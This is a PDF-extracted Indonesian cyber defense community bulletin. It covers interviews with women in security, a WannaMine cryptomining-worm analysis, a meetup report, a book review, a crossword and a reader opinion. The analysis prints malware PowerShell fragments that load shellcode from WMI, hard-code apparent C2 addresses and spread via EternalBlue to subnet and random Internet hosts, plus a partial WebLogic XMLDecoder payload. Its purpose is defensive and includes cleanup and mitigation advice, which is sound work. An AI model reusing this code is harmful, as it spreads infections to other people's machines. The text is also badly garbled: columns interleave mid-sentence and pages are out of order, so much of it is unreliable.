karir wanita di IT Security? itu ada, namun terkubur dengan ketakutan
akan stereotype yang bahkan kebenaran-
A : Waaah, sebenarnya terbuka sekali. De- nya pun masih dipertanyakan. Ada ban-
mand sedang banyak karena awareness yak teman-teman yang saya kenal beralih
dari public mulai terbentuk (hal ini salah sa- pada bidang lain hanya karena merasa ti-
tunya disebabkan oleh semakin banyaknya dak mampu untuk bersaing, bahkan disaat
bentuk-bentuk serangan siber yang ber- belum mencoba. Hal ini sangatlah
dampak langsung kepada masyarakat disayangkan, karena bisa jadi potensi
luas), apalagi regulator mulai menggalak- mereka suatu saat bisa membuat dunia IT
kan aspek keamanan teknologi. Security ini lebih maju lagi.
Cuma tantangannya ya itu, melawan Q : Menurut anda, apa yang harus dila-
stereotype yang sudah terbentuk. Tapi, di- kukan pemerintah dalam hal ini BSSN
mana ada kemauan disitu ada jalan kan
untuk membuat wanita di Indonesia ter-
ya, saya percaya sekali dengan ini. Selama
tarik untuk bekerja di bidang keamanan
ini yang bisa membuat semangat dan
siber (cybersecurity)?
happy, peluang karir di dunia IT Security ini
menurut saya selalu terbuka lebar. A : Untuk perlahan menghilangkan stereo-
type, mungkin pembentukan platform
Q : Setelah menggeluti dunia IT Security
khusus wanita bisa dilakukan. Diadakan-
sekian lama, menurut pendapat mba
nya meetup-meetup khusus wanita yang
Icha, hal apa sih menurut mba Icha bergelut di dunia keamanan siber, riset ber-
yang dapat menguatkan bahwa dunia IT sama dan acara-acara lain yang berkaitan
Security tetap memerlukan sentuhan dapat diselenggarakan. Hal ini bermaksud
wanita ? sebagai bentuk penguatan mental juga, un-
tuk menunjukkan, “Ini loooh, bidang ini
A : Wah, saya masih anak baru di dunia si-
ada ceweknya juga, kamu gak sendirian”.
ber ini, masih perlu banyak sekali belajar.
Biar gak jiper duluan kalo pas meetup
Saya percaya tiap individu memiliki talent
yang dateng laki-laki semua, hhe,
masing-masing. Terlepas dari gender,
77
Lebih Dekat dengan Elisabeth ‘Ibeth’ Damayanti
- Srikandi Siber Indonesia
-Ibeth Damayanti
Pada kesempatan ini kita berkesempatan Q: Bisa tolong jelaskan peran ibu di PT
untuk mewawancarai salah satu wanita Telkom Indonesia ?
yang berkecimpung di dunia keamanan si-
A: Saat ini saat ini saya menjabat sebagai
ber Indonesia. Dia adalah Ibu Ibeth Damay-
Operational Senior Manager pada Cyber
anti, saat ini beliau adalah Operational Sen-
Security Operation Center. Tanggung ja-
ior Manager Cyber Security di PT Telkom
wab utama saya adalah memastikan opera-
Group. Untuk mengenal lebih dekat menge-
sional dan pengelolaan dari jaringan dan
nai beliau dan bagaimana beliau bisa ter-
keamanan IT di Telkom Group.
jun menekuni dunia keamanan siber, mari
kita simak wawancara dengan beliau.
but terbukti sangat berguna tidak hanya un- ingin pindah jalur karir ke bidang kea-
tuk kehidupan professional saya tapi juga manan siber?
kehidupan pribadi saya. A : Ubah mindset untuk menjadi lebih ingin
tahu dan lebih peka. Orang-orang di luar
sana memiliki pemikiran yang diluar kebi-
asaan, jadi kita juga perlu berpikir diluar
hal-hal yang biasa. Jika sebelumnya kita
81
4 “Knowing is not enough,
we must apply it. Willing
is not enough, we must
HOT TOPICS do it”
– Johann Wolfgang van Goethe
WannaMine, Malware Canggih Pembajak CPU
ditulis oleh Christofer Simbar
Sumber : https://www.techworm.net/wp-content/uploads/2018/02/cryptocurrency-mining-malware.png
Bagi anda yang berkecimpung di dunia TI, kerentanan pada SMB v1 pada sistem op-
atau memiliki ketertarikan dengan erasi Microsoft Windows.
teknologi, tentu masih ingat dengan seran-
gan malware WannaCry yang sempat mem- Sudah beberapa bulan berlalu sejak insi-
buat heboh hampir seluruh negara di dunia den tersebut, namun ternyata masih
pada bulan Mei 2017. Tidak terkecuali banyak organisasi dan perusahaan yang
dan sekolah juga ikut terkena dampaknya. gasi yang disarankan Microsoft Security
Dalam penyebarannya, malware ini meng- Bulletin MS17-010, misalnya dengan mela-
kukan patch atau menonaktifkan SMB v1.
gunakan exploit EternalBlue yang dirilis
Kondisi ini kemudian dimanfaatkan oleh
pertama kali ke publik oleh The Shadow
para pembuat malware untuk membuat
Broker. Exploit ini sendiri memanfaatkan
Varian WannaMine yang saya temukan ter- 1. Menggunakan WMI untuk melakukan
masuk canggih, karena sebagian besar persistensi
payload utamanya tidak menggunakan file.
2. Mencuri kredensial menggunakan
Payload yang berisi instruksi berupa skrip
Mimikatz, dan mengirimkannya ke C2
powershell dan beberapa binary disimpan
(Command and Control) server
pada WMI (Windows Management Instru-
mentation) Class. Payload ini kemudian di-
3. Mengidentifikasi target berikutnya
load langsung ke memori menggunakan
dengan mengidentifkasi subnet kom-
teknik yang disebut dengan Reflective DLL
puter, menggunakan perintah NET-
Injection.
STAT untuk berpindah ke
subnet lain, dan menghasil-
kan IP address secara acak
untuk berpindah ke target
lain melalui Internet.
Berdasarkan sejumlah referensi di Internet, malware ini menggunakan nama WMI Class
yang berbeda-beda. Hal ini berarti sudah tersedia malware kit yang bisa memudahkan
penggunanya membuat varian baru.
Infeksi awal
Dari berbagai sumber di Internet, ada 2 macam cara yang berhubungan dengan infeksi
awal malware ini, yang pertama melalui email phishing dan yang kedua dengan meman-
faatkan kerentanan pada komputer korban. Mekanisme dengan email phishing dilakukan
dengan menyisipkan skrip command line pada konten email.
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
Pada komputer yang terkena WannaMine, akan terbentuk sebuah WMI Class palsu yang
diberi nama sesuai selera si penyerang. Ada yang menggunakan nama TaskServices,
Gambar 3 Tampilan WMI Class palsu yang dibuat oleh malware dengan
bantuan tool WBEMTEST.exe
Anda mungkin bertanya, apa fungsi dari properties dalam class tersebut. Berikut penje-
lasannya:
Kombinasi berbagai skrip untuk melakukan remote DLL Loading menggunakan WMI
funs
dan EternalBlue yang sudah di-obfuscate untuk mempersulit deteksi
ipsu Daftar IP Address yang bisa diakses menggunakan kredensial yang dicuri
vcp Binary untuk msvcp120.dll, runtime library untuk Microsoft Visual C++
vcr Binary untuk msvcr120.dll, runtime library untuk Microsoft Visual C++
Dalam sebuah whitepaper yang berjudul “Windows Management Instrumentation (WMI) Of-
fense, Defense and Forensic”, Fireeye menjelaskan dengan sangat rinci tentang bagaimana
WMI digunakan untuk persistensi serangan, dan sekaligus juga menjelaskan bagaimana
cara mendeteksinya. Ada 3 class yang diperlukan untuk mencapai persistensi dengan
WMI:
• __EventFilter, yaitu jenis event yang akan digunakan sebagai pemicu (trigger)
• __EventConsumer, yaitu instruksi atau perintah yang akan dieksekusi pada saat event
aktif. Isi perintah disimpan dalam property bernama CommandLineTemplate.
Untuk menganalisis payload dengan lebih mudah, kita bisa menyimpan output langsung
ke file dengan perintah berikut ini:
Untuk men-decode Base64 payload ke bentuk aslinya, bisa menggunakan layanan online
misalnya https://www.base64decode.org/.
Pada saat eksekusi awal WannaMine akan mendownload payload bernama info6.ps1 un-
tuk sistem operasi 64 bit, atau info3.ps1 untuk sistem operasi 32 bit. Pada tulisan ini saya
mengambil sample info6.ps1.
File info6.ps1 terdiri atas 2 bagian besar, bagian yang pertama berisi sebuah variable $fa
dengan nilai berupa Base64 string. Variabel ini menyimpan seluruh payload yang akan di-
masukkan ke dalam WMI class. Bagian kedua di-obfuscate menggunakan tool yang dikem-
bangkan oleh Daniel Bohannon (https://github.com/danielbohannon/Invoke-Obfuscation ).
Malware ini menggunakan sejumlah skrip open source yang dipublikasikan di Github. Be-
berapa skrip yang berhasil diidentifikasi yaitu (urutan sesuai isi property “funs” pada WMI
class Win32_Services):
https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1
https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
https://github.com/EmpireProject/Empire/blob/master/data/module_source/exploitation/Exploit-Eterna
lBlue.ps1
https://github.com/vletoux/ms17-010-Scanner
Berikut ini adalah beberapa bagian skrip yang dieksekusi melalui CommandLineTem-
plate:
Skrip di atas akan mengambil isi property “funs” pada WMI Class Win32_Services dan
menggunakannya sebagai referensi untuk eksekusi skrip selanjutnya.
$NTLM = $False
#load shellcode
$scba = ([WmiClass] 'root\default:Win32_Services').Properties['sc'].Value
[byte[]]$sc = [System.Convert]::FromBase64String($scba)
se = @('195.22.127.157', '93.174.93.73')
$nic = '195.22.127.157'
if ($line.count -le 4) {
continue
}
$i = $line[-3].split(':')[0]
if (($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains
$i))
{
$ips += $i
}
}
if ($re -eq 1)
{
$ipsu = $ipsu + " " + $ip
}
else
{
#jika vulnerable MS17-010,lakukan inject shellcode dengan EternalBlue
$vul = [PingCastle.Scanners.m17sc]::Scan($ip)
if ($vul -and $i17 -notcontains $ip)
{
$res = eb7 $ip $sc
if ($res -ne $true)
{
eb8 $ip $sc
}
$i17 = $i17 + " " + $ip
}
}
}
}
}
Pada bagian ini malware melakukan scanning ke seluruh IP address dalam subnet yang
sama, dan juga menggunakan perintah NETSTAT untuk mencari IP di subnet lain yang
terkoneksi.
while ($true) {
$ip = [IPAddress]::Parse([String] (Get-Random)).IPAddressToString
$vul = [PingCastle.Scanners.m17sc]::Scan($ip)
#jika vulnerable lakukan injeksi dengan EternalBlue
if ($vul)
{
$res = eb7 $ip $sc
if ($res -ne $true)
{
eb8 $ip $sc
}
}
Start-Sleep 5
}
}
Pada bagian akhir, malware mencoba mencari target lainnya di Internet yang memiliki
kerentanan SMBv1.
Berikut ini adalah contoh skrip powershell yang bisa digunakan untuk membersihkan
WannaMine:
if ($wmi)
{
Write-Host "Connection on computer $ip successful." -ForegroundColor DarkGreen;
#these lines are used to kill malicious process which can be identified by their command
line or path
! wmic /node:$ip process WHERE "COMMANDLINE LIKE '%%default:Win32_Services%'" CALL TERMI-
NATE
wmic /node:$ip process WHERE "COMMANDLINE LIKE '%%info6.ps1%'" CALL TERMINATE
! wmic /node:$ip process WHERE
"ExecutablePath='C:\\ProgramData\\UpdateService\\UpdateService.exe'" CALL TERMINATE!
Skrip di atas dirancang untuk penggunaan pada komputer-komputer yang tergabung da-
lam Active Directory dimana eksekusi dilakukan menggunakan user domain yang memiliki
akses ke komputer-komputer yang terinfeksi. Untuk eksekusi menggunakan administrator
lokal, maka username dan password harus didefinisikan setelah perintah WMIC. Contoh:
Hal-hal yang perlu diperhatikan selama proses penanganan adalah sebagain berikut:
๏ Gunakan akun khusus untuk melakukan remote desktop ke komputer yang terinfeksi.
Jangan menggunakan Domain Administrator atau akun administrator lain yang memiliki
akses ke komputer lain yang bersih.
Berikut ini adalah langkah-langkah yang bisa dilakukan untuk meredam penyebaran dan
menghapus persistensi WannaMine.
1. Lakukan pembatasan akses internet melalui firewall, blokir port-port yang tidak diperlu-
kan terutama port yang digunakan oleh WannaMine yaitu 8000 dan 14444. Perlu diper-
hatikan bahwa port ini bisa berbeda sesuai varian.
4. Ganti password seluruh user pada komputer yang terinfeksi, dimulai dengan user yang
memiliki hak akses tertinggi. Misalnya jika Domain Administrator pernah melakukan
login ke server yang terinfeksi, maka password domain administrator yang harus di-
ganti pertama kali, dilanjutkan dengan user lainnya.
Kesimpulan
Saat ini semakin banyak malware yang memanfaatkan software resmi Microsoft untuk
mengeksekusi payload dan melakukan penyebaran. Hal ini membuat pencegahan semakin
sulit dan pada suatu saat tidak bisa dicegah lagi. Kemampuan untuk mendeteksi dan
merespon dengan cepat adalah bagian yang penting dalam program keamanan informasi.
Sebagian besar insiden keamanan informasi dapat dicegah melalui penerapan praktek-
praktek standar yang sering diabaikan, misalnya Patch Management dan Least Privilege.
Patch Management yang baik akan menghindarkan anda dari insiden akibat
known exploit, sedangkan praktek Least Privilege misalnya penerapan Egress Filtering
pada Firewall dan pembatasan penggunaan administrator untuk aktivitas harian akan mem-
bantu memperkecil dampak insiden.
19. https://social.technet.microsoft.com/F
orums/en-US/de86f13b-74f0-424c-81
69-62750d3fe7c4/powershell-high-cpu
-end-task-every-90-minutes?forum=wi
nserverpowershell
20. https://forum.eset.com/topic/14143-p
owershell-script-100-cpu-load-malicio
us-attack/
21. https://community.spiceworks.com/to
pic/2111360-powershell-virus
22. https://social.technet.microsoft.com/F
orums/windows/en-US/ce6b5111-42f5
-4d59-9d9c-ed9617521c7b/server-infe
cted-with-wanna-mine-malware?forum
=winserversecurity
23. http://www.straitstimes.com/world/org
anisations-hit-by-global-cyberattack
CHRISTOFER SIMBAR
CISSP, CEH, Fortinet NSE 4
Network Security Professional,
Google Certified Associate An-
droid Developer
Information Security Analyst di
BPJS Kesehatan
sumber :
https://www.simplilearn.com/ice9/free_resources_article_thumb/cyber-secu
rity-interview-questions-and-answers-article.jpg
3rd Meetup - Cyber Defense Community di
Grha Datacomm
Pada meetup kali ini (meetup ke-3), kini gili- kaki sendiri). Namun sejauh apa kemandir-
ran PT. Datacomm yang menjadi lokasi ke- ian itu diwujudkan hal ini yang perlu didefin-
giatan dari Komunitas CDEF untuk berkum- isikan lebih rinci. Tidak hanya itu pada sesi
pul, bertukar pikiran dan berbagi informasi ini juga dibahas 2 topik menarik lainnya,
maupun pengalaman seputar topik “cyber yakni SOC Functional Area dan Synchronis-
defense”. Dalam kesempatan ini komuni- ing Information Security Actors.
tas mencoba mengangkat tema mengenai
“Membangun Kemandirian Teknologi da- Kegiatan ini sengaja dilakukan di tanggal
lam IT Security”, sebuah topik yang cukup 14 Februari 2018, selain untuk memeriah-
menarik mengingat di era pemerintahan kan hari Kasih Sayang, tetapi juga sebagai
saat ini hal ini coba digelorakan kembali hari peluncuran perdana Bulletin CDEF
dengan konsep “berdikari” (berdiri di atas sebgai salah satu bentuk konkrit komuni-
https://kitsia.id/attachment/download/?id=
48
has bahwasanya threat actor biasanya dari Daniel Bohannon ini wajib menjadi ru-
menggunakan obfuscation pada binary file jukan bagi semua Blue team untuk mempe-
untuk mencegah adanya deteksi dari IOC lajari TTP dari para threat actor.
(Indicator of Compromise) yang dimiliki
oleh Blue Team. Namun ada teknik lainnya # Reportase Kegiatan : Digit Oktavianto
yaitu dengan menggunakan Character In-
sertion Obfuscation technique untuk
mengelabui deteksi melalui penggunaan
escape character oleh threat actor.
6
found it hard to hack most
people. If you listen to
them, watch them, their vul-
nerabilities are like a neon
Ulasan Buku sign screwed into their
heads”
– Elliot Alderson, Mr. Robot
Judul Buku : Network Forensics – Panduan Analisis dan
Investigasi Paket Data Jaringan
Menggunakan Wireshark
Penulis : Agus Kurniawan
Penerbit : ANDI Yogyakarta
Tahun Terbit : 2012
Rating : 4.2 dari 5 Bintang
Ulasan
Buku ini membahas spesifik mengenai aktivitas network
forensic yang biasa dilakukan forensic investigator ketika mela-
kukan analisa terhadap evidence dari packet capture di dalam
“Buku ini sangat
jaringan. Aktivitas network forensic dalam buku ini sendiri spe-
cocok untuk
sifik membahas penggunaan tools Wireshark yang meru-
pembaca dengan
pakan aplikasi umum yang digunakan untuk menganalisa
tingkatan pemula
paket data. Buku ini membahas dari hal dasar, serta pengeta-
yang ingin belajar
huan dasar fundamental penggunaan Wireshark. Jika anda
mengenai packet
belum familiar menggunakan tools Wireshark, anda tidak
analysis.”
perlu khawatir karena penulis memberikan langkah demi lang-
kah mengenai penggunaan Wireshark dalam buku ini.
118
analysis serta mempelajari network forensic. Hanya saja studi
kasus yang diberikan untuk network forensic tidak terlalu
banyak dan hampir sebagian besar kontennya (sekitar 60-
70%) lebih banyak membahas packet analysis ketimbang net-
work forensic. Menurut saya buku ini cukup layak anda miliki
untuk di jadikan sumber referensi belajar packet analysis.
Ulasan
119
masi ada beberapa cara untuk mendapatkan sumber data
feed untuk Threat Intelligence, yaitu : Open Source Feeds,
RSS Feeds, Proprietary Feeds, Social Media, Researcher Site,
Deep Web, Youtube, dan berbagai sumber lainnya.
120
7 “If you think technology can
solve your security
problems, then you don’t
understand the problems
Pertanyaan Mendatar
4. Salah satu jenis malware yang mengincar sistem SCADA yang juga dibahas pada bulle-
tin pertama CDEF
7. Nama programmer pertama di dunia yang juga merupakan seorang wanita
8. Komunitas keamanan siber khusus untuk wanita
9. Salah satu jenis NIDS
10. Nama asli pemilik akun twitter @malwareunicorn
12. Sebuah proses yang dapat dipakai untuk meng-identifikasi perilaku peretas
Pertanyaan Menurun
5. Salah satu fase pada proses nomor 12 yang dilakukan peretas untuk meng-identifikasi
dan menggali informasi lebih terkait target operasinya
6. Nama komputer desktop pertama dari Apple yang juga merupakan nama anak perem-
puan Steve Jobs
16. Sistem Operasi yang dibuat secara khusus untuk keperluan analisis malware
Bagi yang berhasil mengisi semua jawaban pada Teka-Teki ini dan mengirimkan
jawaban paling pertama akan mendapatkan hadiah menarik dari Tim Redaksi. Jawa-
ban dapat dikirimkan kepada Tim Redaksi melalui alamat e-mail : redaksi@cdef.id,
paling lambat 14 Mei 2018
a
u
t h r e a t
h a a p t
e n i
n s y s l o g i
t o d e f e n d s
i m p s
c w s n o r t
a a a
t r i a w a r e n e s s
i e x p l o i t o
o s t m
n r e g u l a s i a
c c l
k i
Mendatar
Menurun
125
OPINI PEMBACA
ditulis oleh Arin, Datacomm
Dalam menyambut serangan dalam dunia cyber yang semakin banyak dan ganas, diperlu-
kan adanya SDM yang mumpuni dalam bidang tersebut. Semoga kedepannya dunia pen-
didikan menyadari dan mengembangkan kurikulum keilmuannya terutama dalam dunia
cyber security. Beberapa SMK swasta di Indonesia telah memulai perubahan kurikulum
dengan menambahkan kurikulum mengenai pertahanan dalam dunia cyber. Hal ini sangat
menggembirakan karena semakin berkembangnya pengetahuan ini dimulai pada jenjang
pendidikan menengah. Pengetahuan tersebut akan menjadi bekal bagi fresh graduate
dan memudahkannya saat akan berkarir dalam bidang cyber security.
Saat ini juga sudah banyak perusahaan di Indonesia yang menyadari pentingnya per-
lindungan dalam bidang cyber. Baik sebagai pemberi jasanya maupun pengguna
jasanya. Semoga kedepannya tetap ada dan semakin berkembangnya fasilitas serta karir
pada bidang ini di Indonesia. Selain terbukanya lapangan pekerjaan, kecanggihan
teknologi yang semakin berkembang akan dimanfaatkan oleh aktor jahat dalam meraih ke-
untungan. Sehingga karir dalam bidang cyber masih diperlukan.
Tidak sedikit penuntut ilmu yang ingin mempelajari cyber security maupun ingin berkarir
dalam bidang tersebut. Namun, tidak sedikit kurikulum pendidikan yang tidak
menyediakan pembelajaran tersebut atau tidak sesuai dengan jurusan pendidikannya. Be-
runtungnya, terdapat komunitas pecinta cyber defense yang terbentuk, meski tidak se-
dikit juga yang timbul lalu tenggelam. Semoga kedepannya komunitas cyber semakin
berkembang, seperti adanya komunitas Cyber Defense (CDEF) di Indonesia.
126
Komunitas CDEF ini berisi para ahli cyber security, tetapi memberikan kesempatan bagi
pemula dalam dunia cyber untuk menambah wawasan dan informasi dalam dunia cyber
security. Anggota komunitasnya sangat terbuka dalam berbagi ilmu maupun wawasan-
nya, dalam artian tidak pelit ilmu. Kerap kali, dalam komunitas ini juga berdiskusi menge-
nai isu-isu cyber security terkini. Selain pembahasan dalam grup, menariknya komunitas
ini mengadakan comunity meetup tiga bulan sekali yang dihadiri oleh anggotanya mau-
pun orang umum, untuk mengadakan diskusi secara tatap muka. Semoga komunitas ini
terus berkembang dan menginspirasi para penuntut ilmu di Indonesia.
TERIMA KASIH PARA PEMBACA BULLETIN CDEF
Silahkan menyebar luaskan majalah ini, majalah ini adalah majalah gratis atau tidak ber-
bayar. Pungutan yang berkaitan dengan majalah ini di luar tanggung jawab kami. Silahkan
kutip konten majalah ini, tapi mohon tetap sertakan nama asli penulisnya sebagai bentuk
penghargaan dan kerja keras penulis dalam membuat tulisan atau artikel tersebut.
cxxviii